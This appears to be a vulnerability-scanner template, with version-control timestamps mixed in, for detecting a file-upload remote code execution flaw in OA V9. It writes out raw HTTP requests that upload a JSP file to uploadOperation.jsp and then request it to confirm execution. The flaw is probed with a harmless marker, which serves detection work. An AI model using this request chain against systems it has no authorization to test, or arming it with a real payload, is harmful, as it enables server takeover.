2021-04-13 07:06:02 +00:00
id : oa-v9-uploads-file
info :
2021-05-10 07:53:08 +00:00
name : OA V9 RCE via File Upload
2021-04-13 07:06:02 +00:00
author : pikpikcu
severity : high
2021-05-10 06:35:10 +00:00
description : A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
2021-04-13 07:06:02 +00:00
reference : https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
2021-04-13 20:23:24 +00:00
tags : rce,jsp
2021-04-13 07:06:02 +00:00
requests :
- raw :
- |
POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Length : 216
Cache-Control : max-age=0
Upgrade-Insecure-Requests : 1
Origin : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
Connection : close
------WebKitFormBoundaryFy3iNVBftjP6IOwo
Content-Disposition : form-data; name="file"; filename="poc.jsp"
Content-Type : application/octet-stream
<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>
------WebKitFormBoundaryFy3iNVBftjP6IOwo--
- |
GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1
Host : {{Hostname}}
User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
2021-04-13 20:23:24 +00:00
req-condition : true
2021-04-13 07:06:02 +00:00
matchers :
2021-04-13 20:23:24 +00:00
- type : dsl
dsl :
- 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")'
- 'status_code_2 == 200'
condition : and